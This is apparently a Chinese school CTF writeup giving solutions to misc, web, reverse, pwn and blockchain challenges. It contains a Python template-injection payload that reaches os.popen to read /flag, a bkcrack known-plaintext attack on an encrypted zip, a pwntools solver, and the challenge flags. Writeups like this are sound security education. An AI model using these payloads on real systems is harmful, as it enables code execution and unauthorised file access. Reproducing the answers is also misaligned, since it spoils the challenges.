校赛Writeup
misc
[简单] superlative render
eigh tfou 4aj1
HTML
<div tal:content="python:getattr(().__class__.__bases__[0].__subclasses__()[159].__init__, '__glob'+'als__')['po'+'pen']('cat /flag').read()">test</div>
<p>${getattr(().__class__.__bases__[0].__subclasses__()[159].__init__, '__glob'+'als__')['po'+'pen']('cat /flag').read()}</p>flag{mIsUzu_Wl1l_CRoVvn_7HE_pRlma573l1@_lN_H.i.1_wINt3r}
[中等] 时代的眼泪
Python
with open("bin", "rb") as f:
data = f.read()
# extract odd bits and save
with open("even", "wb") as f:
for i in range(len(data)):
if i % 2 == 0:
f.write(bytes([data[i]]))
with open("odd", "wb") as f:
for i in range(len(data)):
if i % 2 == 1:
f.write(bytes([data[i]]))Text
eigh tfou 4aj1Shell
bkcrack -C crack.zip -c flag.txtw -x 32 65696768 -x 36 74666f75 -x 480 34616a31
bkcrack 1.8.0 - 2025-08-18
[12:49:19] Attack on 4194304 Z values at index 39
Keys: 4ccfb9d4 4db14f38 2b70df4f
87.7 % (3679382 / 4194304)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 3679382
[13:21:46] Keys
4ccfb9d4 4db14f38 2b70df4f
bkcrack -C crack.zip -k 4ccfb9d4 4db14f38 2b70df4f -U unlocked.zip new_passwordPython
flag = "4aj1"
key = "ainatas"
encrypted = vigenere_encrypt(flag, key)
print(encrypted)
#ftng{l4eyav0tr@ihq_15_@lzrawy_gu4lntxd_LT}flag{s4egan0gr@phy_15_@lready_ou4dated_TT}
web
[简单] tarot_site
当太阳不在牌堆中时,它会在哪里升起?
Shell
curl -X POST http://ctf.a1natas.com:23747/api/orrery.php \
-H "Content-Type: application/json" \
-d '{"ids":["M-19"],"token":28}'reverse
[签到] AAAbase
Text
S2m1WSzwzSSHa0KkPhNta1S3bkOSJRW3VTaIahqOPjSDRBGiV049MN==两次base64,自定义码表
Text
XYZABCDEFGHIJKLMNOPQRSTUVWxyzabcdefghijklmnopqrstuvw0123456789+/flag{W31c0m3_70_R3v3r53!!!!}
[简单] binary
sub_1400015B9
C
if (i % 4 == 0) s[i] ^ 0x12 == v5[i / 4]
if (i % 4 == 1) s[i] + 5 == v4[i / 4]
if (i % 4 == 2) s[i] + s[i - 1] == v3[i / 4]
if (i % 4 == 3) i ^ s[i] == v2[i / 4]C
v5 = [39, 39, 107, 77]
v4 = [56, 56, 53, 58]
v3 = [102, 102, 165, 104]
v2 = [92, 88, 121, 108]逐位逆回去得到内部 16 字节
533_533_y0ur_53c
flag{533_533_y0ur_53c}
[简单] driver
用户侧:
C
packet[0] = 32;
packet[1] ^= 0x20;
packet[i+1] ^= packet[i];
packet[i+1] = flag[i] ^ flag[i-1]; // 相邻异或差分然后调用驱动
C
0x222004 // BoxInit
0x222008 // key = "driver_box_key"
0x222010 // 加密 packet
0x222020 // 校验驱动:
C
const unsigned __int8 g_Target[33] =
{ 244u, 210u, 84u, 253u, 226u, 194u, 94u, 97u, 239u, 44u, 1u, 116u, 212u, 222u, 1u, 251u, 188u, 146u, 39u, 167u, 137u, 28u, 132u, 239u, 72u, 229u, 94u, 74u, 249u, 241u, 189u, 35u, 78u
}; // idbC
buffer[k] ^= g_Sbox[(g_Sbox[i] + old_sbox_i) & 0xff] ^ 0x55;先用同样的 KSA/PRGA 解出 packet,再逆相邻异或:
C
flag[0] = packet[1] ^ 0x20;
for (let i = 1; i < 32; i++) {
flag[i] = packet[i + 1] ^ flag[i - 1];
}Python
g_Target = [244,210,84,253,226,194,94,97,239,44,1,116,212,222,1,251,188,146,39,167,137,28,132,239,72,229,94,74,249,241,189,35,78]
key = b"driver_box_key"
s = list(range(256))
j = 0
for i in range(256):
old = s[i]
j = (j + key[i % len(key)] + old) & 0xFF
s[i], s[j] = s[j], old
i = 0
j = 0
packet = []
for c in g_Target:
i = (i + 1) & 0xFF
old = s[i]
j = (j + old) & 0xFF
s[i], s[j] = s[j], old
stream = s[(s[i] + old) & 0xFF] ^ 0x55
packet.append(c ^ stream)
flag = bytearray(32)
flag[0] = packet[1] ^ 0x20
for i in range(1, 32):
flag[i] = packet[i + 1] ^ flag[i - 1]
print(flag)
flag{u53r_15_dr1v3r_n07_dr1v3r!}
pwn
[签到] math-game
Python
from pwn import *
r = remote("ctf.a1natas.com", 29594)
while True:
line = r.recvline().decode()
print(line)
if(line[0] == '['):
formula = line.split('=')[0].split(']')[1].strip()
print(formula,eval(formula))
r.sendline(str(eval(formula)))
r.interactive()
flag{df0b0046-6a65-4d5c-8eda-c1f59f1cfc64}
blockchain
[中等] 简单的blockchain
- 装浏览器插件
- 创建自定义链 http://180.184.70.197:8545
- 连nc,[1] 创建账号,记一下token
- [2] 观察到需要钱,去水龙头搞钱 http://180.184.70.197:8080
- [2]有钱了之后部署合约
- [4]复制源码
- 打开remix
- 编译部署
- 观察到代码逻辑中
uint256 coinFlip = currentBlockValue / FACTOR;,每次调用一下getValue()看是否需要翻转,然后调用flip(true),重复十次 - 确保consecutiveWins=10
- [3]拿flag